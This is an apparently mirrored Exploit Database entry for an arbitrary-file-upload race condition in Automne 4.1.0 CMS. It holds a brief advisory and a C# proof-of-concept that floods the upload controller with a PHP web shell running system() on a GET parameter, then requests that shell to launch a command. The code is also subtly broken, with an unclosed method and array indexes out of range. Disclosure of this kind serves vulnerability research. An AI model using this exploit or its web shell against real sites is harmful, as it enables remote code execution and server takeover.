WS Interactive Automne 4.1 – ‘/admin/upload-controler.php’ Arbitrary File Upload

Exploit Database
124 阅读

作者： AutoSec Tools

日期： 2011-03-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35417/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

source: https://www.securityfocus.com/bid/46774/info

Automne is prone to an arbitrary-file-upload vulnerability.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Automne 4.1.0 is vulnerable; other versions may also be affected.

Home Software Services Advisories Contact

Automne 4.1.0 Race Condition

// ------------------------------------------------------------------------

// Software................Automne 4.1.0

// Vulnerability...........Race Condition

// Threat Level............Very Critical (5/5)

// Download................http://en.automne-cms.org/

// Release Date............3/6/2011

// Tested On...............Windows Vista + XAMPP

// ------------------------------------------------------------------------

// Author..................AutoSec Tools

// Site....................http://www.autosectools.com/

// Email...................John Leitch <john@autosectools.com>

// ........................Bryce Darling <bryce@autosectools.com>

// ------------------------------------------------------------------------

// --Description--

// A race condition in Automne 4.1.0 can be exploited to bypass

// validation performed on uploaded files. The following proof of concept

// uploads a PHP script and then attempts to execute it before it is deleted.

// --PoC--

using System;

using System.Collections.Generic;

using System.Text;

using System.Threading;

using System.Diagnostics;

using System.Net.Sockets;

namespace RaceConditionExploit

{

class Program

{

static bool trying = true;

static void SendReq(string req)

{

try

{

var bytes = ASCIIEncoding.ASCII.GetBytes(req);

var client = new TcpClient();

client.Connect("localhost", 80);

using (var stream = client.GetStream())

stream.Write(bytes, 0, bytes.Length);

}

catch (Exception ex)

{

Console.WriteLine(ex);

}

static void CheckForCalc()

{

if (Process.GetProcessesByName("calc").Length != 0)

trying = false;

}

static void Main()

{

var resets = new[]

{

new ManualResetEvent(false),

};

ThreadPool.QueueUserWorkItem(x =>

{

resets[0].WaitOne();

while (trying)

{

SendReq(@"POST /automne/automne/admin/upload-controler.php?atm-regen=shell.php HTTP/1.1

Host: localhost

Proxy-Connection: keep-alive

User-Agent: x

Content-Length: 193

Cache-Control: max-age=0

Origin: null

Content-Type: multipart/form-data; boundary=----x

Accept: text/html

Accept-Encoding: gzip,deflate,sdch

Accept-Language: en-US,en;q=0.8

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x

Content-Disposition: form-data; name=""Filedata""; filename=""shell.php""

Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>

------x--

");

CheckForCalc();

}

resets[1].Set();

});

ThreadPool.QueueUserWorkItem(x =>

{

resets[0].WaitOne();

while (trying)

{

SendReq(@"GET http://localhost/automne/automne/upload/shell.php?CMD=calc.exe HTTP/1.1

Host: localhost

Connection: keep-alive

Cache-Control: max-age=0

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.119 Safari/534.16

Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Encoding: gzip,deflate,sdch

Accept-Language: en-US,en;q=0.8

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Cookie: PHPSESSID=poiued4lsn8im03kb80t6131n3; osclass=9aae23cu0mqtopjv126loiu9n6; AutomneSession=mo70c3rth2qboupjpfbo010gv0

");

CheckForCalc();

}

resets[2].Set();

});

resets[0].Set();

resets[1].WaitOne();

resets[2].WaitOne();

}